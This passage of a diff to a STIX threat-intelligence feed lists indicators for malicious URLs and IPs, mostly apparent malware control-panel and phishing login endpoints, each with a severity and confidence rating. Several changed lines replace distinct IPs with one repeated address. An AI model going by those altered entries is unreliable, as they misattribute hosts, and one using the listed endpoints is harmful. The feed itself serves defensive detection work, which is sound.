'http://f0402912.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:24:01.214Z"} {"created":"2020-02-20T05:24:21.239Z","description":"TS ID: 55330801567; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--3ea0e805-8fa3-40ce-84e5-bf39318f35a6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-20T05:24:21.239Z","name":"mal_url: http://f0404052.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0404052.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:24:21.239Z"} {"created":"2020-02-20T05:24:33.205Z","description":"TS ID: 55330801581; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime","id":"indicator--b9cccc62-550f-4f5b-bb32-f580c23fe382","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T05:24:33.205Z","name":"mal_url: http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:24:33.205Z"} -{"created":"2020-02-20T05:24:35.843Z","description":"TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--314ecb7a-db3a-4a64-9c0c-1361891c26c3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-02-20T05:24:35.843Z","name":"mal_ip: 193.32.188.146","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '193.32.188.146']","type":"indicator","valid_from":"2020-02-20T05:24:35.843Z"} +{"created":"2020-02-20T05:24:35.843Z","description":"TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--314ecb7a-db3a-4a64-9c0c-1361891c26c3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-02-20T05:24:35.843Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T05:24:35.843Z"} {"created":"2020-02-20T05:24:47.629Z","description":"TS ID: 55330801610; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--d594d88f-2e74-4539-99a3-7fc7ae29ac7f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:24:47.629Z","name":"mal_url: http://castmart.ga/~zadmin/lmark/aps/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/lmark/aps/uMc.php']","type":"indicator","valid_from":"2020-02-20T05:24:47.629Z"} {"created":"2020-02-20T05:24:47.645Z","description":"TS ID: 55330801575; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--d20e7f50-caac-4054-b816-6f4a9a9283b9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T05:24:47.645Z","name":"mal_url: http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:24:47.645Z"} {"created":"2020-02-20T05:25:26.502Z","description":"TS ID: 55328307491; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--fb3209c5-4de8-4554-9bb4-ed8cc2b19915","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-02-20T05:25:26.502Z","name":"mal_url: http://instaboom-hello.site/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://instaboom-hello.site/login.php']","type":"indicator","valid_from":"2020-02-20T05:25:26.502Z"} @@ -497,7 +497,7 @@ {"created":"2020-02-21T02:52:28.296Z","description":"TS ID: 55333174457; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ec1f4e5c-0878-4dcf-9141-4a83b8abeb2c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-21T02:52:28.296Z","name":"mal_url: http://groysman.club/host/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://groysman.club/host/admin.php']","type":"indicator","valid_from":"2020-02-21T02:52:28.296Z"} {"created":"2020-02-21T02:52:31.697Z","description":"TS ID: 55333174438; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--40502e97-56ae-4194-81d7-fc08ebff68c1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-21T02:52:31.697Z","name":"mal_url: http://nortonlilly.info/ace/ts/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/ace/ts/login.php']","type":"indicator","valid_from":"2020-02-21T02:52:31.697Z"} {"created":"2020-02-21T02:52:33.704Z","description":"TS ID: 55333174439; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--d9ed2a5f-0f87-4d87-adec-7a925fc848e4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-21T02:52:33.704Z","name":"mal_url: http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-21T02:52:33.704Z"} -{"created":"2020-02-21T02:52:34.992Z","description":"TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime","id":"indicator--097b92f4-6865-49db-8e59-2a89df364749","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-21T02:52:34.992Z","name":"mal_ip: 84.38.180.229","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '84.38.180.229']","type":"indicator","valid_from":"2020-02-21T02:52:34.992Z"} +{"created":"2020-02-21T02:52:34.992Z","description":"TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime","id":"indicator--097b92f4-6865-49db-8e59-2a89df364749","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-21T02:52:34.992Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-21T02:52:34.992Z"} {"created":"2020-02-21T02:52:35.038Z","description":"TS ID: 55333174442; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--03ea9edc-6654-4287-b452-988c85380295","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-60"],"modified":"2020-02-21T02:52:35.038Z","name":"mal_url: http://jusper.zzz.com.ua/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jusper.zzz.com.ua/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:52:35.038Z"} {"created":"2020-02-21T02:52:38.593Z","description":"TS ID: 55333174440; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--99f64515-7513-4764-b278-987c5df8484b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-21T02:52:38.593Z","name":"mal_url: http://azur.kl.com.ua/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://azur.kl.com.ua/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:52:38.593Z"} {"created":"2020-02-21T02:53:25.758Z","description":"TS ID: 55333174450; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--afdd7c21-d8c6-419e-84be-5c8b2ce1a829","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-21T02:53:25.758Z","name":"mal_url: http://d98527ix.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://d98527ix.beget.tech/login']","type":"indicator","valid_from":"2020-02-21T02:53:25.758Z"} @@ -506,45 +506,45 @@ {"created":"2020-02-21T02:53:40.48Z","description":"TS ID: 55333174451; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--51994ab0-1f97-4bcb-9f24-9fcd3d2364aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-21T02:53:40.48Z","name":"mal_url: http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-21T02:53:40.48Z"} {"created":"2020-02-21T02:53:42.327Z","description":"TS ID: 55333174456; iType: mal_url; State: active; Org: WebHS; Source: CyberCrime","id":"indicator--c9d733d6-25c7-4306-9246-c08194e3073a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-21T02:53:42.327Z","name":"mal_url: http://livdecor.pt/ali/Panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://livdecor.pt/ali/Panel/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:53:42.327Z"} {"created":"2020-02-21T02:53:58.967Z","description":"TS ID: 55333174444; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--1322e66c-185d-4f46-80d4-d5751722d4cf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-21T02:53:58.967Z","name":"mal_url: http://liweff.eu/kp/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://liweff.eu/kp/login.php']","type":"indicator","valid_from":"2020-02-21T02:53:58.967Z"} -{"created":"2020-02-21T02:54:44.049Z","description":"TS ID: 55333174436; iType: mal_url; State: active; Org: 1&1 Internet AG; Source: CyberCrime","id":"indicator--733d93ce-6ce8-4272-b564-b09818dbdbbb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-20"],"modified":"2020-02-21T02:54:44.049Z","name":"mal_url: http://82.165.18.207/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://82.165.18.207/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:54:44.049Z"} -{"created":"2020-02-21T02:54:44.075Z","description":"TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime","id":"indicator--fc0b39d5-d097-4e61-a4cd-970929467bad","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-50"],"modified":"2020-02-21T02:54:44.075Z","name":"mal_ip: 185.90.59.42","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.90.59.42']","type":"indicator","valid_from":"2020-02-21T02:54:44.075Z"} +{"created":"2020-02-21T02:54:44.049Z","description":"TS ID: 55333174436; iType: mal_url; State: active; Org: 1&1 Internet AG; Source: CyberCrime","id":"indicator--733d93ce-6ce8-4272-b564-b09818dbdbbb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-20"],"modified":"2020-02-21T02:54:44.049Z","name":"mal_url: http://89.160.20.156/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:54:44.049Z"} +{"created":"2020-02-21T02:54:44.075Z","description":"TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime","id":"indicator--fc0b39d5-d097-4e61-a4cd-970929467bad","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-50"],"modified":"2020-02-21T02:54:44.075Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-21T02:54:44.075Z"} {"created":"2020-02-22T02:52:52.6Z","description":"TS ID: 55335562485; iType: mal_url; State: active; Org: PDR; Source: CyberCrime","id":"indicator--92dd4ff2-7072-4262-b47d-b04cae8480e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-22T02:52:52.6Z","name":"mal_url: http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:52:52.6Z"} {"created":"2020-02-22T02:52:53.322Z","description":"TS ID: 55335562462; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--122f6e46-781f-4d00-8247-6cf4047b0c9f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:52:53.322Z","name":"mal_url: http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:52:53.322Z"} {"created":"2020-02-22T02:52:53.756Z","description":"TS ID: 55335562495; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--d5b42516-dfa2-499d-bc2b-c5c10617e7c9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:52:53.756Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/frega/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:52:53.756Z"} {"created":"2020-02-22T02:52:53.779Z","description":"TS ID: 55335562482; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--0668db3a-adb5-4e2e-b8f2-18e3870e2d7c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-22T02:52:53.779Z","name":"mal_url: http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:52:53.779Z"} -{"created":"2020-02-22T02:52:59.853Z","description":"TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime","id":"indicator--679fd604-82cb-47cd-a968-e87e9cca7fac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-22T02:52:59.853Z","name":"mal_url: http://86.106.93.103/mpdu/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://86.106.93.103/mpdu/index.php']","type":"indicator","valid_from":"2020-02-22T02:52:59.853Z"} -{"created":"2020-02-22T02:53:10.018Z","description":"TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--cdbffa12-c6c9-4723-807f-46b9672a23a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-22T02:53:10.018Z","name":"mal_ip: 95.142.44.87","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '95.142.44.87']","type":"indicator","valid_from":"2020-02-22T02:53:10.018Z"} +{"created":"2020-02-22T02:52:59.853Z","description":"TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime","id":"indicator--679fd604-82cb-47cd-a968-e87e9cca7fac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-22T02:52:59.853Z","name":"mal_url: http://89.160.20.156/mpdu/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/mpdu/index.php']","type":"indicator","valid_from":"2020-02-22T02:52:59.853Z"} +{"created":"2020-02-22T02:53:10.018Z","description":"TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--cdbffa12-c6c9-4723-807f-46b9672a23a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-22T02:53:10.018Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-22T02:53:10.018Z"} {"created":"2020-02-22T02:53:11.62Z","description":"TS ID: 55335562491; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--2218c7b6-3e94-4885-9a70-1f724d8453cc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-22T02:53:11.62Z","name":"mal_url: http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:53:11.62Z"} {"created":"2020-02-22T02:53:34.685Z","description":"TS ID: 55335562511; iType: mal_url; State: active; Org: T-Mobile Czech Republic; Source: CyberCrime","id":"indicator--773fabfe-63b5-4681-8189-4dffad1747fc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-46"],"modified":"2020-02-22T02:53:34.685Z","name":"mal_url: http://ccilfov.ro/css/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ccilfov.ro/css/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:53:34.685Z"} -{"created":"2020-02-22T02:53:34.733Z","description":"TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime","id":"indicator--5e32213f-5daa-4181-a108-0fc58482adcb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:53:34.733Z","name":"mal_ip: 66.172.27.221","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '66.172.27.221']","type":"indicator","valid_from":"2020-02-22T02:53:34.733Z"} +{"created":"2020-02-22T02:53:34.733Z","description":"TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime","id":"indicator--5e32213f-5daa-4181-a108-0fc58482adcb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:53:34.733Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-22T02:53:34.733Z"} {"created":"2020-02-22T02:53:34.767Z","description":"TS ID: 55335562468; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--b07ae083-b56c-48b0-bfdb-6cf786978ce8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:53:34.767Z","name":"mal_url: http://nortonlilly.info/zeya/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/zeya/login.php']","type":"indicator","valid_from":"2020-02-22T02:53:34.767Z"} {"created":"2020-02-22T02:53:36.179Z","description":"TS ID: 55335562472; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--42e0fb49-dd09-4979-a4d0-ff310d14acf8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:53:36.179Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/adaba/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/adaba/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:53:36.179Z"} {"created":"2020-02-22T02:53:45.219Z","description":"TS ID: 55335562429; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--8d2d349a-763b-406b-ba8c-8ba684058028","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-02-22T02:53:45.219Z","name":"mal_url: http://51.83.200.179/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://51.83.200.179/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:53:45.219Z"} {"created":"2020-02-22T02:53:56.922Z","description":"TS ID: 55335562488; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--965a2554-cc08-488c-8d81-a29e8402eec1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-22T02:53:56.922Z","name":"mal_url: http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:53:56.922Z"} {"created":"2020-02-22T02:54:18.93Z","description":"TS ID: 55335562502; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--e75aa726-cbb0-486f-ac25-947fc76fb5de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-22T02:54:18.93Z","name":"mal_url: http://paperblank.best/gHL6qufBKIulnp11/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://paperblank.best/gHL6qufBKIulnp11/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:18.93Z"} -{"created":"2020-02-22T02:54:18.975Z","description":"TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--9f6d9425-fc79-4493-8f95-81ac2a7ae188","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-22T02:54:18.975Z","name":"mal_ip: 8.208.3.169","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '8.208.3.169']","type":"indicator","valid_from":"2020-02-22T02:54:18.975Z"} +{"created":"2020-02-22T02:54:18.975Z","description":"TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--9f6d9425-fc79-4493-8f95-81ac2a7ae188","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-22T02:54:18.975Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-22T02:54:18.975Z"} {"created":"2020-02-22T02:54:27.432Z","description":"TS ID: 55335562494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--1333f7e6-3af0-4aea-b798-a54f03d68ac5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:54:27.432Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/frega2/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega2/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:54:27.432Z"} {"created":"2020-02-22T02:54:27.479Z","description":"TS ID: 55335562474; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--f4e076ed-6393-49d5-adc2-cbe730ff48db","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:54:27.479Z","name":"mal_url: http://castmart.ga/~zadmin/beta/herm/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/beta/herm/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:27.479Z"} {"created":"2020-02-22T02:54:29.634Z","description":"TS ID: 55335562505; iType: mal_url; State: active; Org: ChunkHost; Source: CyberCrime","id":"indicator--2b38be23-b226-460e-9b17-4480e930f271","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:54:29.634Z","name":"mal_url: http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:29.634Z"} {"created":"2020-02-22T02:54:29.689Z","description":"TS ID: 55335562500; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--0bfd644c-62ef-4f03-9d1d-304673d912f1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-22T02:54:29.689Z","name":"mal_url: http://pay-robokassa.net/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pay-robokassa.net/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:29.689Z"} {"created":"2020-02-22T02:54:47.42Z","description":"TS ID: 55335562476; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--a15df968-dec6-4122-811e-1144011d0653","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:54:47.42Z","name":"mal_url: http://nortonlilly.info/jb/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/jb/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:47.42Z"} -{"created":"2020-02-22T02:54:48.824Z","description":"TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime","id":"indicator--11fec449-039c-4d64-aefa-210e96074633","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-40"],"modified":"2020-02-22T02:54:48.824Z","name":"mal_url: http://185.70.185.34/host/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.70.185.34/host/admin.php']","type":"indicator","valid_from":"2020-02-22T02:54:48.824Z"} +{"created":"2020-02-22T02:54:48.824Z","description":"TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime","id":"indicator--11fec449-039c-4d64-aefa-210e96074633","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-40"],"modified":"2020-02-22T02:54:48.824Z","name":"mal_url: http://89.160.20.156/host/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/host/admin.php']","type":"indicator","valid_from":"2020-02-22T02:54:48.824Z"} {"created":"2020-02-22T02:54:49.84Z","description":"TS ID: 55335562466; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--5d04eb73-cda3-4f22-bcaf-604660d26343","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:54:49.84Z","name":"mal_url: http://nortonlilly.info/ace1/st/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/ace1/st/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:49.84Z"} -{"created":"2020-02-22T02:54:51.052Z","description":"TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime","id":"indicator--f7bafcb3-679f-4959-8ed0-d3d8b62eceef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-22T02:54:51.052Z","name":"mal_url: 